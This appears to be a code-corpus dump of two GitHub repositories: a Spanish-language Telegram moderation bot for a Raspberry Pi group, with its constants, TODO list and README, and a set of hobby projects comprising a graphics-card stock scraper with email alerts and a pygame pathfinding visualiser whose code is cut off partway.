update.message.reply_text(tag_text, parse_mode=ParseMode.MARKDOWN, quote=False)\n else:\n update.message.reply_text(\"😣 Actualmente no hay tags registrados\")\n\n\ndef delete_tag(bot, update):\n query = update.callback_query\n tag = \"#\" + update.callback_query.message.text.split(\"#\")[1][:-2]\n if query.data in \"Si_delete\":\n # Solicitamos permiso al semáforo\n switch_semaforo(START, HASHTAG)\n # Leemos las tags del fichero\n bot_tags = read_json(HASHTAG_FILE)\n # Comprobamos si la lectura ha tenido éxito\n if bot_tags is None:\n logger.info(\"Error de lectura del hashtagfile en delete_tag.\")\n # Liberamos el semáforo\n switch_semaforo(END, HASHTAG)\n bot.edit_message_text(text=\"❌ Problema de lectura del fichero hashtagfile al borrar el tag\",\n chat_id=query.message.chat_id,\n message_id=query.message.message_id)\n return\n\n # Buscamos primero el tag, y si no está, retornamos error\n if tag.lower() not in bot_tags:\n switch_semaforo(END, HASHTAG)\n bot.edit_message_text(text=\"⚠ El tag no se encuentra en la lista. Abortamos...\",\n chat_id=query.message.chat_id,\n message_id=query.message.message_id)\n return\n\n # Si está, entonces lo borramos\n del bot_tags[tag]\n # Y grabamos\n try:\n with open(HASHTAG_FILE, \"w\") as f:\n json.dump(bot_tags, f)\n # Liberamos el semáforo\n switch_semaforo(END, HASHTAG)\n bot.edit_message_text(text=\"♻️El tag ha sido eliminado correctamente de la lista! 🗑\",\n chat_id=query.message.chat_id,\n message_id=query.message.message_id)\n return\n except:\n logger.info(\"Error de lectura del hashtagfile en graba_tag.\")\n # Liberamos el semáforo\n switch_semaforo(END, HASHTAG)\n bot.edit_message_text(text=\"❌ Problema al guardar el fichero hashtagfile al borrar el tag\",\n chat_id=query.message.chat_id,\n message_id=query.message.message_id)\n return\n else:\n bot.edit_message_text(text=\"✋🏼 Anulado el borrado del tag... ✋🏼\",\n chat_id=query.message.chat_id,\n message_id=query.message.message_id)\n\n\ndef bienvenida(bot, update):\n chat_id = update.message.chat_id\n if chat_id == GROUPS_ID[\"Raspython\"]:\n update.message.reply_text(\"Bienvenido al grupo de Raspython... DISFRUTA Y PARTICIPA! 👋🏼\\n\"\n \"Ábreme un privado <a href='http://t.me/RaspythonBot'>\"\n \"PINCHANDO AQUÍ</a> e iníciame para obtener información...\",\n parse_mode=ParseMode.HTML)\n\n\ndef idchannel(bot, update):\n chat_id = update.message.chat_id\n user_id = update.message.from_user.id\n name = update.message.from_user.name\n update.message.reply_text(\"{}, tienes el UserID: {} y me escribes desde {}\".format(name, user_id, chat_id))\n\n\ndef main():\n # Inicializamos nuestro bot\n raspython_bot = Updater(token=TOKEN)\n # Generamos el dispatcher para recoger los comandos y textos del chat\n dispatcher = raspython_bot.dispatcher\n\n # Definición de los comandos\n dispatcher.add_handler(CommandHandler(\"start\", start))\n dispatcher.add_handler(CommandHandler(\"help\", bot_help))\n dispatcher.add_handler(CommandHandler(\"canales\", canales))\n dispatcher.add_handler(CommandHandler(\"normas\", normas))\n dispatcher.add_handler(CommandHandler(\"tags\", list_tags))\n dispatcher.add_handler(CommandHandler(\"idchannel\", idchannel))\n\n # Capturador de nuevos miembros\n dispatcher.add_handler(MessageHandler(Filters.status_update.new_chat_members, bienvenida))\n\n # Capturador de comandos no reconocidos\n dispatcher.add_handler(MessageHandler(Filters.command, comando_invalido))\n\n # Capturador de textos. Capturaremos aquello que no sean comandos explícitos\n # Cuando contienen hashtags\n dispatcher.add_handler(MessageHandler(Filters.entity(MessageEntity.HASHTAG), parsing_hashtag))\n # Cuando es texto\n dispatcher.add_handler(MessageHandler(Filters.text, trata_texto))\n\n # Capturador del menú de borrado de tags (Si y No)\n raspython_bot.dispatcher.add_handler(CallbackQueryHandler(delete_tag, pattern=\"Si_delete|No_delete\"))\n\n # Arrancamos el bot, empezamos a capturar peticiones\n # Con clean ignoramos los mensajes pendientes...\n raspython_bot.start_polling(clean=True)\n # Y lo dejamos esperando\n raspython_bot.idle()\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.6626865863800049,
"alphanum_fraction": 0.7186567187309265,
"avg_line_length": 29.85714340209961,
"blob_id": "a3a1aeede7fcab9d14a21b1e7840f9e03da56226",
"content_id": "02c01dedc4591895712f5d9316c6a3882608a3e1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1345,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 42,
"path": "/constantes.py",
"repo_name": "cpasoft/Raspython-Bot",
"src_encoding": "UTF-8",
"text": "# TOKEN de nuestro bot. Es entregado por BotFather.\r\nTOKEN = \"<PONER AQUI EL TOKEN DE VUESTRO BOT>\"\r\n\r\n# Relación de los Chat_ID de los grupos de la Raspito's Family\r\nGROUPS_ID = {\r\n \"Raspython\": -1001122218457,\r\n \"General\": -1001027822398,\r\n \"Mediacenters\": -1001088073949,\r\n \"Emuladores\": -1001081864192,\r\n \"Off-topic\": -1001051912425,\r\n}\r\n\r\n# Tiempo para el antiflood\r\nANTIFLOOD_MINUTES = 15\r\n\r\n# Tiempos y mensajes para el antiflood de mensajes por usuario\r\n# En segundos (Mensajes por segundo)\r\nAFLOOD_TIME = 40\r\nAFLOOD_MSGS = 5\r\n# Minutos de castigo de borrado de mensajes\r\nAFLOOD_MINUTES_DEL = 5\r\n\r\n# Relación de los User_ID de las personas autorizadas a hacer tareas restringidas en el Bot. (AkA moderadores)\r\nADMINS = [<PONER LOS ID DE LOS ADMINS AQUI SEPARADOS POR COMAS>]\r\n\r\n# Ubiación del fichero de Log de nuestro Bot. Importante que el usuario con el que se corra el bot tenga derechos de\r\n# escritura sobre dicho fichero.\r\nLOG_FILE = \"RaspythonBot.log\"\r\n\r\n# Ubicación del fichero de hashtags\r\nHASHTAG_FILE = \"databases/hashtags.json\"\r\nANTIFLOOD_FILE = \"databases/antiflood.json\"\r\nANTIFLOOD_TAG_FILE = \"databases/antiflood_tag.json\"\r\nMSG_AFLOOD_FILE = \"databases/antiflood_msg.json\"\r\n\r\n# Constantes para semáforo:\r\nSTART = True\r\nEND = False\r\nHASHTAG = 1\r\nANTIFLOOD = 2\r\nANTIFLOOD_TAG = 3\r\nMSG_FLOOD = 4\r\n\r\n"
},
{
"alpha_fraction": 0.7323014140129089,
"alphanum_fraction": 0.7373093366622925,
"avg_line_length": 42.91999816894531,
"blob_id": "16062367e1567290cd41bebde33eef407bfd2e2c",
"content_id": "e450cfd350ab489b3f251364fa63feee0da760c5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 4462,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 100,
"path": "/TODO.txt",
"repo_name": "cpasoft/Raspython-Bot",
"src_encoding": "UTF-8",
"text": "\t\t==> RASPYTHON-BOT <==\n\nRaspython bot pretende ser un bot de moderación creado por y para el grupo\nde Telegram @Raspython.\n\n==========================================================================\n(2017:)\n* Requisitos iniciales - 25 de junio\n* Adición del esqueleto del bot y las primeras funciones - 26 de junio\n* Creada sección de opciones ya implementadas al pie de este documento - 28 de junio\n[Reunión del 29 de junio]\n* Se acuerdan las siguientes condiciones para el antiflood:\n-> Más de 4 mensajes en 10 segundos:\n\t1º) Advertencia\n\t2º) Borrado de mensajes\n\t3º) Kick/Ban\n\n\n- Que sea capaz de enviar conversaciones que se salgan de la temática del\ngrupo a el resto de grupos de la familia Raspito, siguiendo las siguientes\nnormas:\n\nPalabra clave:\t\t\tCanal:\n#general\t\t\t@GrupoRaspberryPi\n(Si alguien hace una pregunta genérica sobre la pi, como por ejemplo que\ncaja comprar, que ventilador adquiri, etc., le mandaremos con el tag\n#general al grupo genérico de Raspberry)\n\n#mediacenters\t\t\t@RaspberryPiMediacenters\n(Si alguien hace una pregnta sobre el uso de las pi como mediacenter o\nsimilares, con el tag #mediacenters le mandaremos al grupo correspondiente)\n\n#emuladores\t\t\t@RaspberryPiEmuladores\n(Siguiendo la filosofía anterior, si alguien pregunta sobre emuladores,\narcades y demás, usaremos el tag #emuladores para enviarlo para dicho grupo)\n\n#off-topic\t\t\t@RaspberryPiOfftopic\n(Para todo lo demás, les enviaremos al grupo off-topic)\n\n- Sistema de advertencias. Los usuarios podrán enviar reportes a otros\nusuarios, y si este recibe más de x (decidiremos este \"x\"), dicho usuario\nserá expulsado del grupo por el bot.\nTambién los usuarios podrán, de la misma forma, quitar los reportes.\n\n- Que el bot detecte flood y advierta al usuario si realiza un flood\nsuperior a x en un tiempo determinado...\n\n- Un sistema de puntuación de usuarios, que cuando a alguien le guste algo \nque ha dicho otra persona o le haya ayudado, pueda darle un \"like\" a algún\nmensaje. El bot llevará la cuenta de likes y cuando se le haya dado un\ncierto número mínimo de likes al mensaje en cuestión (por ejemplo, 10), se\nle aumentará en una decima la reputación a dicho usuario. Y evidentemente un\ncomando para consultar el like de cierta persona. Creo que si llega a calar,\nno solo serviría para saber cuanto ayuda alguien, si no también motivaría\nmucho a la peña para que intenten ayudar.\n\n- Un comando de mensaje de cuenta atrás: que al mensaje que se escriba a\ncontinuación se mantenga un cierto tiempo (es decir, un mensaje con\ncaducidad) y pasado ese tiempo el bot se encargue de eliminarlo.\nPara mensajes que son solo informativos, tipo claves de raspito, k sabes k\npasadas 24 horas ya estarán cogidas y no tiene sentido que se quede escrito\nen el grupo ese mensaje.\n\n- Un comando de mensaje futuro: que se pueda preparar un mensaje para una \nfecha/tiempo posterior, y llegado ese momento el bot genere dicho mensaje.\n\n- Cuando alguien mande un link, añadir un sistema de me gusta no me gusta, y\nsi llega a x negativos, se borra el mensaje.\n\n- Algún easteregg (con control de flood)\n\n\n=======================================================================================\n=======================================================================================\nYA IMPLEMENTADO:\n- Que sea capaz de mostrar una reglas del grupo. Se ha decidido dejar como\nestático, porque no es una cosa que cambie muy amenudo como para que merezca\nel exfuerzo de hacerlo editable en vivo.\n\"\"\"\n📜 Las reglas de este grupo son muy sencillas...\n\n⛔️Nada de sexo explícito, ni política, ni religión, ni nada no relacionado con la temática del canal.\n🚫 Tampoco están permitidos los enlaces a otros grupos o páginas webs que cumplan los criterios anteriormente descritos.\n❓ En caso de dudas, consultar con cualquier administrador del grupo.\n\n🤙🏼 Como último requisito, pasarlo bien, disfrutar, compartir y que fluya el buen rollo\n\"\"\"\n\n- Bienvenida. Que el bot de la bienvenida a todo nuevo usuario y le envíe\nla información básica del grupo.\n\n- Que sea capaz de memorizar tags que los moderadores podrán crear en\nprivado, con documentación que se considere de interés con una serie de\nlanzadores. Por ejemplo #libros, y que el bot devuelva una lista de libros\ninteresantes sobre python.\n\n- Implementar un decorador antiflood\n\n- La ayuda que la envíe a privado, y si no puede, que muestre el mensaje de\nque lo pregunte por privado"
},
{
"alpha_fraction": 0.7792642116546631,
"alphanum_fraction": 0.7892976403236389,
"avg_line_length": 36.375,
"blob_id": "2b7ad0057b7e313c0d1323dcf123518b2135408c",
"content_id": "0fdb378408734113c560660d4e3b8eae4832fd14",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 605,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 16,
"path": "/README.md",
"repo_name": "cpasoft/Raspython-Bot",
"src_encoding": "UTF-8",
"text": "# Raspython-Bot\nBot de moderación para el grupo Raspython\n\nLa Raspito's Family tiene un nuevo miembro en Telegram. En este caso, se\ntrata de un grupo dedicado a la programación en Python orientada a Raspberry\nPi. El grupo lo tenéis en el siguiente enlace...\nhttps://t.me/Raspython\n\nPues bien, nuestro primer proyecto será crear un Bot moderador que realice\ntareas automáticas para el mantenimiento del grupo.\n\nPara recopilar toda la información, hemos creado un hilo en el foro de\nraspberry... El link es el siguiente:\nhttps://www.fororaspberry.es/viewtopic.php?f=40&t=6211\n\nANÍMATE Y PARTICIPA!!!\n"
}
] | 4 |
TableauServerbyPackt/TableauSDKAndAPI
|
https://github.com/TableauServerbyPackt/TableauSDKAndAPI
|
dd3aac7f6f0aa75d3768a0050edc989b7f9ecc42
|
27e0052fc4886e45a9fe4f3882b703afc3789eb5
|
da4c1f7f1d3b5553db497af15458bf6b9fb6dec6
|
refs/heads/master
| 2020-04-13T05:09:22.313663 | 2018-12-24T11:43:10 | 2018-12-24T11:43:10 | 162,983,143 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6049165725708008,
"alphanum_fraction": 0.6136962175369263,
"avg_line_length": 29.79729652404785,
"blob_id": "aee1b2d956eadb76b45ba6b973a2d6512653fa75",
"content_id": "ca223559d987285785336dfb8f492290f7250db1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2278,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 74,
"path": "/python/create_extract.py",
"repo_name": "TableauServerbyPackt/TableauSDKAndAPI",
"src_encoding": "UTF-8",
"text": "## import the libraries\nimport tableausdk.Extract as tde\nimport pandas as pd\nimport os\n\n## bring in a sample Graduate School Admissions datasets\nfile_name = \"http://www.ats.ucla.edu/stat/data/binary.csv\"\ndf = pd.read_csv(file_name)\ndf.head()\ndf.shape\n\n## create the extract name, but remove the extract if it already exists\nfname = \"example.tde\"\ntry: \n tdefile = tde.Extract(fname)\nexcept:\n os.system('del ' + fname)\n os.system('del DataExtract.log')\n tdefile = tde.Extract(fname)\n\n\n## define the table definition\ntableDef = tde.TableDefinition()\n\n## create a list of column names and types\ncolnames = df.columns\ncoltypes = df.dtypes\n\n## create a dict for the field maps\n## Caveat: I am not including all of the possibilities below\nfieldMap = {\n 'float64' : tde.Types.Type.DOUBLE,\n 'float32' : tde.Types.Type.DOUBLE,\n 'int64' : tde.Types.Type.DOUBLE,\n 'int32' : tde.Types.Type.DOUBLE,\n 'object': tde.Types.Type.DOUBLE,\n 'bool' : tde.Types.Type.DOUBLE\n}\n\n## for each column, add the appropriate info the Table Definition\nfor i in range(0, len(colnames)):\n cname = colnames[i]\n ctype = fieldMap.get(str(coltypes[i]))\n tableDef.addColumn(cname, ctype) \n\n\n## create the extract from the Table Definition\n## Super Hacky, but legible\n## for each row, add the data to the table\n## Again, not accounting for every type or errors\nwith tdefile as extract:\n table = extract.addTable(\"Extract\", tableDef)\n for r in range(0, df.shape[0]):\n row = tde.Row(tableDef)\n for c in range(0, len(coltypes)):\n if str(coltypes[c]) == 'float64':\n row.setDouble(c, df.iloc[r,c])\n elif str(coltypes[c]) == 'float32':\n row.setDouble(c, df.iloc[r,c])\n elif str(coltypes[c]) == 'int64':\n row.setDouble(c, df.iloc[r,c]) \n elif str(coltypes[c]) == 'int32':\n row.setDouble(c, df.iloc[r,c])\n elif str(coltypes[c]) == 'object':\n row.setString(c, df.iloc[r,c])\n elif str(coltypes[c]) == 'bool':\n row.setBoolean(c, df.iloc[r,c])\n else:\n row.setNull(c)\n # insert the row\n table.insert(row)\n\n## close the file\ntdefile.close()"
}
] | 1 |
harnold8/projects
|
https://github.com/harnold8/projects
|
1d54fb45e05d8acb529a3eeb1c436f8323e4c213
|
7b9834e36091d7a44aa3c0b750ecd0b37bbdad4e
|
82527ac4ffe6da830e8edef16b3fe16cfabd0a07
|
refs/heads/main
| 2023-01-31T14:56:26.318402 | 2020-12-02T20:17:09 | 2020-12-02T20:17:09 | 301,434,748 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5967336893081665,
"alphanum_fraction": 0.6524288058280945,
"avg_line_length": 39.92982482910156,
"blob_id": "06b693229e0c21299df23c92bbeb28760b396259",
"content_id": "77c8e66ca511ddd84ad5a43fc204359cb048b61a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2388,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 57,
"path": "/graphics_card_scraper/scraper.py",
"repo_name": "harnold8/projects",
"src_encoding": "UTF-8",
"text": "import requests\r\nimport smtplib\r\nimport time\r\nfrom bs4 import BeautifulSoup\r\n\r\n#checks the availabilty of the graphics card for a specific URL on Caseking.de\r\ndef check_availability(URL):\r\n #my user agent\r\n headers = {\"User-Agent\": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36'}\r\n page = requests.get(URL, headers=headers)\r\n soup = BeautifulSoup(page.content, 'html.parser')\r\n #for the rtx3080 graphics card, this class contains the availability\r\n availability = soup.find(class_=\"frontend_plugins_index_delivery_informations\").get_text()\r\n return(availability)\r\n\r\n#sends an email with the buy link (URL)\r\ndef send_mail(URL):\r\n #gmail handling\r\n server = smtplib.SMTP('smtp.gmail.com',587)\r\n server.ehlo()\r\n server.starttls()\r\n server.ehlo()\r\n #login credentials (make sure to activate less secure apps or two fact auth)\r\n server.login('*yourmail*@gmail.com','*password*')\r\n #email text\r\n subject = 'RTX 3080 available'\r\n body = \"The link \"+ URL\r\n msg = f\"Subject: {subject}\\n\\n{body}\"\r\n server.sendmail(\r\n '*sender*@gmail.com',\r\n '*recipient*@gmail.com',\r\n msg\r\n )\r\n\r\n#pages to check, graphics card I wanted\r\nurls = ['https://www.caseking.de/asus-geforce-rtx-3080-rog-strix-o10g-10240-mb-gddr6x-gcas-399.html',\r\n 'https://www.caseking.de/gigabyte-aorus-geforce-rtx-3080-master-10g-10240-mb-gddr6x-gcgb-331.html',\r\n 'https://www.caseking.de/zotac-gaming-geforce-rtx-3080-amp-holo-10240-mb-gddr6x-gczt-166.html',\r\n 'https://www.caseking.de/msi-geforce-rtx-3080-gaming-x-trio-10g-10240-mb-gddr6x-gcmc-248.html',\r\n 'https://www.caseking.de/asus-geforce-rtx-3080-rog-strix-10g-10240-mb-gddr6x-gcas-400.html',\r\n 'https://www.caseking.de/zotac-gaming-geforce-rtx-3080-trinity-oc-10240-mb-gddr6x-gczt-167.html'\r\n ]\r\n\r\n#I just want one card\r\nfound_card = False\r\nwhile(not found_card):\r\n for url in urls:\r\n #unbekannt->unavailable, everything else means the item is available\r\n if check_availability(url)[0:9]!='unbekannt':\r\n send_mail(url)\r\n print('Card available: '+url+'\\n')\r\n found_card = True\r\n break\r\n else:\r\n print('No card available')\r\n #checking every 60 seconds until I find a card\r\n time.sleep(60)"
},
{
"alpha_fraction": 0.8004115223884583,
"alphanum_fraction": 0.8004115223884583,
"avg_line_length": 120.25,
"blob_id": "5f1b2b67277de32a25750413183113cc5e4a911a",
"content_id": "773cbd629eebc83bd077f5818b449ee956f80876",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 486,
"license_type": "no_license",
"max_line_length": 266,
"num_lines": 4,
"path": "/graphics_card_scraper/ReadMe.md",
"repo_name": "harnold8/projects",
"src_encoding": "UTF-8",
"text": "# Scraper Script\nA scraper script I used at the launch of new graphics cards. Even though the demand for the product was higher than its availability, I managed to get a graphics card with the help of this script :)!\n\nThe script was designed specifically for the www.caseking.de graphics card section. You might want to alternate the scraping for other pages. As soon as the availability of the products changes, an email gets send to the desired recipient with the corresponding url.\n\n"
},
{
"alpha_fraction": 0.7936984300613403,
"alphanum_fraction": 0.7951987981796265,
"avg_line_length": 82.3125,
"blob_id": "045eb41a6d61a21127768b45cede6779a9add6ac",
"content_id": "91e194cacdc37eda1ff7188195a81725c88b7f52",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1333,
"license_type": "no_license",
"max_line_length": 323,
"num_lines": 16,
"path": "/README.md",
"repo_name": "harnold8/projects",
"src_encoding": "UTF-8",
"text": "# Projects\n\n## Pathfinding Algorithms\nI implemented the A*, Dijkstra, Greedy Best First Search and the Breadth-First Search algorithm with a Pygame GUI. A more detailed README version can be found in its subfolder\n\nIn this example, the Dijkstra algorithm can be seen. The orange node depicts the start point, the turquoise node the end point and black nodes correspond to an obstacle. The algorithm proceeds through the grid and marks visited nodes in light blue. Finally, the shortest path between the two nodes is highlighted in yellow.\n\n\n\n## Sudoku Solver\nFor this project I implemented a Sudoku solver (for a 9x9 grid) with a non-recursive Backtracking algorithm (in C++ and Python). The plan is to extend this project in the future, by reading Sudokus with text recognition (OCR) into the data structure.\n\n## Scraper Script\nA scraper script I used at the launch of new graphics cards. Even though the demand for the product was higher than its availability, I managed to get a graphics card with the help of this script :)!\n\nThe script was designed specifically for the www.caseking.de graphics card section. You might want to alternate the scraping for other pages. As soon as the availability of the products changes, an email gets send to the desired recipient with the corresponding url.\n"
},
{
"alpha_fraction": 0.6107487678527832,
"alphanum_fraction": 0.6311635971069336,
"avg_line_length": 26.87759017944336,
"blob_id": "c701ba57e5031ad2e321ea1b5b1ce8b072d88a8f",
"content_id": "2ef0b5e1b5bacb69e3c473a5dbe3e66ee155a6d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15332,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 531,
"path": "/pathfinding_algorithms/path_algos.py",
"repo_name": "harnold8/projects",
"src_encoding": "UTF-8",
"text": "import pygame\r\nimport math\r\nfrom queue import PriorityQueue\r\n\r\nWIDTH = 800\r\nWIN = pygame.display.set_mode((WIDTH+180, WIDTH))\r\npygame.display.set_caption(\"Search Algorithms\")\r\n\r\n#some color codes\r\nRED = (28, 103, 193)\r\nGREEN = (0, 255, 0)\r\nBLUE = (0, 255, 0)\r\nYELLOW = (255, 255, 0)\r\nWHITE = (255, 255, 255)\r\nBLACK = (0, 0, 0)\r\nPURPLE = (128, 0, 128)\r\nORANGE = (255, 165 ,0)\r\nGREY = (128, 128, 128)\r\nTURQUOISE = (64, 224, 208)\r\nEFFECTCOLOR = (97, 159, 232)\r\n\r\n\r\n\r\n#node structure for the grid (x,y). every node is connected with maximum 4 neighbors. stored in neighbors\r\n#diagonal connections are not allowed.\r\n#a spot also holds a color for the visualization\r\nclass Spot:\r\n\tdef __init__(self, row, col, width, total_rows):\r\n\t\tself.row = row\r\n\t\tself.col = col\r\n\t\tself.x = row * width\r\n\t\tself.y = col * width\r\n\t\t#unaccessed color = white\r\n\t\tself.color = WHITE\r\n\t\tself.neighbors = []\r\n\t\tself.width = width\r\n\t\tself.total_rows = total_rows\r\n\t\t#the color might changes after a certain step interval\r\n\t\tself.time_effekt = 0\r\n\r\n\tdef get_pos(self):\r\n\t\treturn self.row, self.col\r\n\r\n\tdef is_closed(self):\r\n\t\treturn self.color == RED\r\n\r\n\tdef is_open(self):\r\n\t\treturn self.color == GREEN\r\n\r\n\tdef is_barrier(self):\r\n\t\treturn self.color == BLACK\r\n\r\n\tdef is_start(self):\r\n\t\treturn self.color == ORANGE\r\n\r\n\tdef is_end(self):\r\n\t\treturn self.color == TURQUOISE\r\n\r\n\tdef reset(self):\r\n\t\tself.color = WHITE\r\n\r\n\tdef make_start(self):\r\n\t\tself.color = ORANGE\r\n\r\n\t#after 7 steps, change the color\r\n\tdef make_closed(self):\r\n\t\tself.color = RED\r\n\t\tself.time_effekt = 7\r\n\r\n\tdef make_open(self):\r\n\t\tself.color = GREEN\r\n\r\n\tdef make_barrier(self):\r\n\t\tself.color = BLACK\r\n\r\n\tdef check_barrier(self):\r\n\t\tif self.color == BLACK:\r\n\t\t\treturn True\r\n\r\n\tdef make_end(self):\r\n\t\tself.color = TURQUOISE\r\n\r\n\tdef make_path(self):\r\n\t\tself.color = YELLOW\r\n\r\n\tdef draw(self, win):\r\n\t\t#change the color after a certain step interval\r\n\t\tif self.time_effekt > 0 and self.is_closed():\r\n\t\t\tpygame.draw.rect(win, EFFECTCOLOR, (self.x, self.y, self.width, self.width))\r\n\t\t\tself.time_effekt += -1\r\n\t\telse:\r\n\t\t\tpygame.draw.rect(win, self.color, (self.x, self.y, self.width, self.width))\r\n\r\n\t#assigns all the possible neighbors (max:D,U,R,L), barriers for example are not allowed to be a neighbor\r\n\tdef update_neighbors(self, grid):\r\n\t\tself.neighbors = []\r\n\t\t# can still move down is not a barrier\r\n\t\tif self.row < self.total_rows - 1 and not grid[self.row + 1][self.col].is_barrier(): # DOWN\r\n\t\t\tself.neighbors.append(grid[self.row + 1][self.col])\r\n\t\t#(0,0) is the upper right corner\r\n\t\tif self.row > 0 and not grid[self.row - 1][self.col].is_barrier(): # UP\r\n\t\t\tself.neighbors.append(grid[self.row - 1][self.col])\r\n\t\t# number of rows=number of columns\r\n\t\tif self.col < self.total_rows - 1 and not grid[self.row][self.col + 1].is_barrier(): # RIGHT\r\n\t\t\tself.neighbors.append(grid[self.row][self.col + 1])\r\n\r\n\t\tif self.col > 0 and not grid[self.row][self.col - 1].is_barrier(): # LEFT\r\n\t\t\tself.neighbors.append(grid[self.row][self.col - 1])\r\n\r\n\tdef __lt__(self, other):\r\n\t\treturn False\r\n\r\n#manhattan distance\r\ndef h(p1, p2):\r\n\tx1, y1 = p1\r\n\tx2, y2 = p2\r\n\treturn abs(x1 - x2) + abs(y1 - y2)\r\n\r\n#draws the shortest path for A*, Greedy BFS and DIJK\r\ndef reconstruct_path(came_from, start, current, draw):\r\n\twhile current in came_from:\r\n\t\tcurrent = came_from[current]\r\n\t\tif current != start:\r\n\t\t\tcurrent.make_path()\r\n\t\tdraw()\r\n\r\n#draws the shortest path for bfs\r\ndef draw_path(draw, shortest_path, start, end):\r\n\tfor items in shortest_path:\r\n\t\tif items != start and items != end:\r\n\t\t\titems.color = YELLOW\r\n\tdraw()\r\n\r\n# finds shortest path between 2 nodes of a graph using BFS\r\ndef bfs(draw, grid, start, end):\r\n\t# keep track of explored nodes\r\n\texplored = []\r\n\t# keep track of all the paths to be checked\r\n\tqueue = [[start]]\r\n\r\n\t# keeps looping until all possible paths have been checked\r\n\twhile queue:\r\n\t\t# pop the first path from the queue\r\n\t\tpath = queue.pop(0)\r\n\t\t# get the last node from the path\r\n\t\tnode = path[len(path)-1]\r\n\r\n\t\tif node not in explored:\r\n\t\t\tneighbours = node.neighbors\r\n\t\t\t# go through all neighbour nodes and build a new path\r\n\t\t\t# if it was never visited, mark it for the visualization\r\n\t\t\tfor neighbour in neighbours:\r\n\t\t\t\tif neighbour.color == WHITE:\r\n\t\t\t\t\tneighbour.make_closed()\r\n\t\t\t\tnew_path = list(path)\r\n\t\t\t\t#append the new element to the existing path\r\n\t\t\t\tnew_path.append(neighbour)\r\n\t\t\t\tqueue.append(new_path)\r\n\r\n\t\t\t\tif neighbour == end:\r\n\t\t\t\t\t#return new_path\r\n\t\t\t\t\tdraw_path(draw, new_path, start, end)\r\n\t\t\t\t\treturn None\r\n\t\t\t# mark node as explored\r\n\t\t\texplored.append(node)\r\n\t\tdraw()\r\n\r\n\r\n#eucledian distance, was used for test purposes\r\ndef eucl(p1, p2):\r\n\tx1, y1 = p1\r\n\tx2, y2 = p2\r\n\treturn math.sqrt((x1 - x2)*(x1 - x2) + (y1 - y2)*(y1 - y2))\r\n\r\n#A* algo\r\ndef algorithm(draw, grid, start, end):\r\n\t#to get a tie braker for equal fs\r\n\tcount = 0\r\n\t#to get the min element\r\n\topen_set = PriorityQueue()\r\n\topen_set.put((0, count, start))\r\n\t#dictionary to assign nodes to nodes to create the shortest path\r\n\tcame_from = {}\r\n\t#setting g and f scores to inf at the beginning, except for the start pos\r\n\tg_score = {spot: float(\"inf\") for row in grid for spot in row}\r\n\tg_score[start] = 0\r\n\tf_score = {spot: float(\"inf\") for row in grid for spot in row}\r\n\t#manhattan dist\r\n\tf_score[start] = h(start.get_pos(), end.get_pos())\r\n\topen_set_hash = {start}\r\n\r\n\twhile not open_set.empty():\r\n\t\tfor event in pygame.event.get():\r\n\t\t\tif event.type == pygame.QUIT:\r\n\t\t\t\tpygame.quit()\r\n\t\t#get the minimum val node\r\n\t\tcurrent = open_set.get()[2]\r\n\t\topen_set_hash.remove(current)\r\n\t\t#shortest path found\r\n\t\tif current == end:\r\n\t\t\treconstruct_path(came_from, start, end, draw)\r\n\t\t\tend.make_end()\r\n\t\t\treturn True\r\n\r\n\t\tfor neighbor in current.neighbors:\r\n\t\t\t#updating the g_score for the neighbors\r\n\t\t\ttemp_g_score = g_score[current] + 1\r\n\t\t\t#if a neighbor has a new lower value, save the new val\r\n\t\t\tif temp_g_score < g_score[neighbor]:\r\n\t\t\t\tcame_from[neighbor] = current\r\n\t\t\t\tg_score[neighbor] = temp_g_score\r\n\t\t\t\t#manhattan dist + steps\r\n\t\t\t\tf_score[neighbor] = temp_g_score + h(neighbor.get_pos(), end.get_pos())\r\n\t\t\t\tif neighbor not in open_set_hash:\r\n\t\t\t\t\tcount += 1\r\n\t\t\t\t\topen_set.put((f_score[neighbor], count, neighbor))\r\n\t\t\t\t\topen_set_hash.add(neighbor)\r\n\t\tdraw()\r\n\t\tif current != start:\r\n\t\t\tcurrent.make_closed()\r\n\treturn False\r\n\r\n#dij\r\ndef dijk(draw, grid, start, end):\r\n\t#to get a tie braker for equal fs\r\n\tcount = 0\r\n\t#to get the min element\r\n\topen_set = PriorityQueue()\r\n\topen_set.put((0, count, start))\r\n\t#dictionary to assign nodes to nodes to create the shortest path\r\n\tcame_from = {}\r\n\tg_score = {spot: float(\"inf\") for row in grid for spot in row}\r\n\tg_score[start] = 0\r\n\topen_set_hash = {start}\r\n\r\n\twhile not open_set.empty():\r\n\t\tfor event in pygame.event.get():\r\n\t\t\tif event.type == pygame.QUIT:\r\n\t\t\t\tpygame.quit()\r\n\t\t#get the minimum val node\r\n\t\tcurrent = open_set.get()[2]\r\n\t\topen_set_hash.remove(current)\r\n\t\t#shortest path found\r\n\t\tif current == end:\r\n\t\t\treconstruct_path(came_from, start, end, draw)\r\n\t\t\tend.make_end()\r\n\t\t\treturn True\r\n\t\t#if a neighbor has a new lower val, save it\r\n\t\tfor neighbor in current.neighbors:\r\n\t\t\ttemp_g_score = g_score[current] + 1\r\n\t\t\tif temp_g_score < g_score[neighbor]:\r\n\t\t\t\tcame_from[neighbor] = 